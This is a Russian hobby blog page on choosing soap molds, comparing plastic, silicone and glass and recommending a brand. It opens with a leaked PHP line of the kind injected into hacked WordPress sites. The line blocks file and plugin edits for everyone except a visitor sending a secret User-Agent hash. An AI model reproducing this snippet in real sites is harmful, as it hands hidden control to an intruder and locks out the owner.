if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Формы для мыла | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Формы для мыла

Как правило в мыловарении используют силиконовые и пластмассовые формочки. У тех и у других есть свои преимущества.

Ингредиенты для мыла - Формы для мыла Ингредиенты для мыла - Формы для мыла

Как пра­ви­ло в мыло­ва­ре­нии исполь­зу­ют сили­ко­но­вые и пласт­мас­со­вые фор­моч­ки. У тех и у дру­гих есть свои преимущества.

Пласт­мас­со­вые фор­мы более доступ­ны. Извле­кать застыв­ший бру­со­чек из них гораз­до про­ще и удоб­нее. Кро­ме того, все эти фор­моч­ки мно­го­ра­зо­во­го исполь­зо­ва­ния. По цене — выгод­нее поку­пать мяг­кий про­зрач­ный пла­стик, сто­ит деше­во, моет­ся лег­ко. Более же дол­го­веч­ны и каче­ствен­ны фор­мы из сили­ко­на. Мыло из них доста­ет­ся более лег­ко. Един­ствен­ный минус сили­ко­но­вых форм — высо­кая сто­и­мость, но насто­я­щих мыло­ва­ров это не долж­но испу­гать, тем более что купить их при­дет­ся все­го один раз.

Хочет­ся сра­зу предо­сте­речь от оши­бок при исполь­зо­ва­нии стек­лян­ной посу­ды. Соглас­на, что мыть ее лег­ко, она мно­го­ра­зо­вая, с мно­же­ством фигур, но достать из нее бру­сок застыв­ше­го мыла про­сто невоз­мож­но! При­дет­ся выскре­бать всю мыль­ную мас­су лож­кой и пере­плав­лять зано­во. Так­же не поку­пай­тесь на сове­ты сма­зать дно стек­лян­ной фор­мы мас­лом. Ника­ко­го эффек­та это так­же не даст. Мыло целым и невре­ди­мым не достанете!

Нович­кам сове­тую при­об­ре­тать фор­мы более деше­вых про­из­во­ди­те­лей, а вот про­фес­си­о­наль­ным мыло­ва­рам луч­ше исполь­зо­вать про­ве­рен­ные фир­мы. Напри­мер, аме­ри­кан­ский про­из­во­ди­тель Milky Way Molds име­ет огром­ный опыт по про­из­вод­ству фор­мо­чек для мыла из проч­ной, про­зрач­ной пласт­мас­сы. Фор­мы Milky Way Mold раз­но­об­раз­ны по раз­ме­ру и фор­ме, раз­ра­бо­тан­ные про­фес­си­о­на­ла­ми, они дол­го­веч­ны и удоб­ны в исполь­зо­ва­нии. Тща­тель­ная про­ра­бот­ка рисун­ков помо­жет создать необык­но­вен­ное мыло руч­ной рабо­ты. А фор­мы-под­до­ны поз­во­лят изго­то­вить 8–10 оди­на­ко­вых кусоч­ков мыла необыч­но­го дизай­на быст­ро и легко.

Уда­чи всем фана­там мыловарения!

 


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!